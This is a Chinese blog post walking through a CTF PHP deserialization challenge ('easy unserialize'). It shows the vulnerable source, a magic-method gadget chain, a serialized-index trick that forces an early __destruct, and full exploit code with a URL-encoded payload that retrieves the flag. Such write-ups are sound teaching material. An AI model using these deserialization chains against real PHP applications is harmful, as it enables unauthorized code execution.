卷王杯 easy unserialize

已于 2022-10-19 18:24:43 修改
阅读量726 收藏
点赞数 1
文章标签: php web安全 安全
于 2022-10-19 18:24:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/127413345
版权
本文详细探讨了一个涉及__destruct、__call、__get等PHP魔术方法的代码执行问题。通过示例代码,解释了如何利用这些魔术方法实现类方法的调用链,并介绍了__destruct的垃圾回收机制,以及如何通过修改序列化数据来触发特定方法。最终,文章展示了如何构造payload来触发MeMeMe()方法,以获取flag。
摘要由CSDN通过智能技术生成

因为一个 __destruct函数的GC回收机制 没学过,所以没解出来。

进入题目,给了源码:

<?php
include("./HappyYear.php");
class one {
    public $object;
 
    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }
 
 
    public function __destruct() {
        @$this->object->add();
    }
 
 
    public function __toString() {
        return $this->object->string;
    }
}
 
 
class second {
    protected $filename;
 
 
    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }
 
 
    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}
 
 
class third {
    private $string;
 
 
    public function __construct($string) {
        $this->string = $string;
    }
 
 
    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}
 
 
if (isset($_GET["ctfshow"])) {
    $a=unserialize($_GET['ctfshow']);
    throw new Exception("高一新生报道");
} else {
    highlight_file(__FILE__);
}

要输出flag,就要调用方法MeMeMe()

一眼看过去,魔术方法__get里面的$var[$name]();都可控,可以利用 数组调用类中方法

数组调用类中方法

关于数组调用类中的方法,再给出几个详细的例子,也是算学得更精了:

##例子1

<?php
error_reporting(0);

class one{
        public function test()
        {
                echo "123";
        }
}
$a=array(one,test);
$a();

##例子2

还有一种是形似题目这种调用数组名的:

可以从调试窗口看到得到清晰的划分。

输出:

123

接下来就是触发各类魔方方法

可以看之前的一篇文章

我这里就把链子理一下:

one::__destruct => second::__call=> second::addMe => one::__toString => third::__get => one::MeMeMe

__destruct函数的GC回收机制:

参考:

https://www.jianshu.com/p/d73b3ca418b0

<?php
class one{
        public function __destruct(){
                echo "__destruct";
        }
}

$a = new one();

throw new Exception("高一新生报道");

解决方法:

<?php
class one{
    public $string;
    public function __destruct(){
        echo "__destruct";
    }
}
 $a=new one();
 $b=array($a,NULL);
 echo serialize($b);

以上代码序列化的结果:

a:2:{i:0;O:3:"one":0:{}i:1;N;}

把后面的i:1改成i:0,达到提前销毁对象的目的,从而执行魔术方法__destruct

payload:

<?php
/**
 * @Author: F10wers_13eiCheng
 * @Date:   2022-02-01 11:25:02
 * @Last Modified by:   F10wers_13eiCheng
 * @Last Modified time: 2022-02-07 15:08:18
 */
include("./HappyYear.php");

class one {
    public $year_parm=array("Happy_func");
    public $object;
    

    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                global $talk;
                echo "$talk"."</br>";
                global $flag;
                echo $flag;
            }
        });
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
}

class second {
    public $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;

    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}

$a=new one();
$a->object=new second();
$a->object->filename=new one();
$a->object->filename->object=new third(array("string"=>[new one(),MeMeMe]));
$b = array($a,NULL);
echo urlencode(serialize($b));

生成的payload:

a%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7Ds%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7Ds%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7Ds%3A6%3A%22object%22%3BN%3B%7Di%3A1%3Bs%3A6%3A%22MeMeMe%22%3B%7D%7D%7D%7D%7D%7Di%3A0%3BN%3B%7D

标注颜色的是由1改成0,达到提前销毁变量触发__destruct的目的

 

清风--
关注
天翼杯easy_eval复现
weixin_44687621的博客
09-25 1522
最近打了很多比赛,很多题没有做出来。所以决定复现一下某些题目。 本地环境的搭建 本地环境涉及到php的web服务、redis数据库。 Dockerfile的编写 FROM ubuntu:16.04 COPY src/sources.list /etc/apt/sources.list COPY src/redis-4.0.9 /home/redis-4.0.9 RUN apt-get update && \ apt-get install -y curl \
php函数serialize()与unserialize()用法实例
10-25
主要介绍了php函数serialize()与unserialize()用法,以实例形式详细讲述了php函数serialize()与unserialize()的适用情况与使用方法,具有很好的参考借鉴价值,需要的朋友可以参考下
CTfshow 卷easy unserialize(特详)
Jay17的博客
05-12 633
CTfshow 卷easy unserialize(特详)
ctfshow-卷
blowed的博客
02-28 835
ctfshow-卷杯web
ctfshow(卷杯)
qq_62046696的博客
09-24 1573
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
phplib类中文详解
zhangxuyu1118的专栏
05-08 642
/** PHPlib模板7.4中文版(不足之处还请各位指正)* (C) Copyright 1999-2000 NetUSE GmbH* Kristian Koehntopp* 彭赞群注释于2004年6月,QQ:9537075 TEL:13787877670* Email:mylovepzq@163.com*//*这里是定义类Template*/class Template{ /* 如果设
ctfshow卷杯——easy unserialize
qq_45766062的博客
03-14 1113
题目源码 <?php /** * @Author: F10wers_13eiCheng * @Date: 2022-02-01 11:25:02 * @Last Modified by: F10wers_13eiCheng * @Last Modified time: 2022-02-07 15:08:18 */ include("./HappyYear.php"); class one { public $object; public function MeMe
2020第十三届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
php中unserialize返回false的解决方法
10-25
不过,在使用unserialize时可能会遇到返回false的情况,这通常意味着序列化的字符串中存在一些问题。针对这一问题,文章首先说明了php中unserialize函数返回false的解决方法。 首先,文章指出序列化是PHP程序设计中...
浅谈php函数serialize()与unserialize()的使用方法
10-25
unserialize()则用于将字符串形式的状态信息转换回原始的数组或对象。这种机制对于需要临时保存变量状态,然后重新加载它们的场景非常有用,例如,在会话管理或者数据持久化操作中。 序列化的数据通常包含了变量...
CTFSHOW卷easy unserialize
Landasika的博客
05-17 1346
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
ctfshow卷杯部分web
Pysnow's Blog
02-27 5620
ctfshow卷杯web部分[easy unserialize&easy web] easy unserialize <?php /** * @Author: F10wers_13eiCheng * @Date: 2022-02-01 11:25:02 * @Last Modified by: F10wers_13eiCheng * @Last Modified time: 2022-02-07 15:08:18 */ include("./HappyYear.php");
2022/03/14ctfshow卷easy unserialize
A的博客
03-14 428
public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { global $talk; echo "$talk"."</br>"; global $flag; echo $fla
攻防世界Web高手进阶区WP(unserialize3)
00勇士王子的博客
08-03 261
unserialize3 打开环境,是一段代码 function用于声明函数 PHP 的魔术方法函数 由上图可知,__wakeup()方法如果使用就是和unserialize()反序列化函数结合使用的,但是在题目代码中并没有序列化字符串。于是,我们这里实例化xctf类并对其使用序列化(这里就实例化xctf类为对象a) <?php class xctf{ //定义一个名为xctf的类 public $flag = '111'; /
0.0.0.0 127.0.0.1等几个特殊的IP地址
zhurobert的博客
10-10 539
0.0.0.0 127.0.0.1 255.255.255.255等特殊地址
PHP智慧餐饮新风尚点餐系统
2401_84593753的博客
10-10 609
总的来说,智慧餐饮新风尚点餐系统不仅为顾客带来了便捷、高效、个性化的点餐体验,也为餐厅提供了有力的运营支持。它让美食与科技实现了完美结合,让我们在享受美食的同时,也能感受到科技的魅力。如果你还没有尝试过这款点餐系统,不妨找个机会去体验一下,相信它会给你带来不一样的惊喜!
【信息安全管理与评估】2023年全国职业院校技能大赛赛题第06套
最新发布
Play_Sai的博客
10-16 600
取证的信息可能隐藏在正常的、已删除的或受损的文件中,您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术,还需要熟悉常用的文件格式(如办公文档、压缩文档、图片等)A 集团的 Ubuntu 服务器被黑客入侵,该服务器的 Web 应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。如私设 DHCP 服务器关闭该端口。
unserialize
08-29
unserialize函数是PHP中的一个函数,它用于将一个字符串表示的序列化对象转换回原始的PHP对象。当使用serialize函数将一个对象序列化为字符串后,可以使用unserialize函数将其还原为原始的对象。 在使用unserialize函数时,如果被反序列化的字符串中包含有特殊的魔术方法(magic methods)如__construct、__destruct、__wakeup等,这些方法会在对象被创建、销毁或者反序列化时自动调用。 反序列化的过程是非常有用的,可以在用户之间传递对象,或者将对象持久化存储到文件或数据库中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [浅谈php函数serialize()与unserialize()的使用方法](https://download.csdn.net/download/weixin_38726255/13043889)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [反序列化(Unserialize)漏洞详解](https://blog.csdn.net/qq_49422880/article/details/120488517)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [渗透测试基础 -unserialize反序列化漏洞](https://blog.csdn.net/weixin_45488495/article/details/116403291)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值